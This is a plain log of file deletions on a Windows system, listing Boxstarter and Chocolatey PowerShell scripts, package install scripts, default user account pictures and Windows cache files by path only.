DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
DeletedFile: C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db
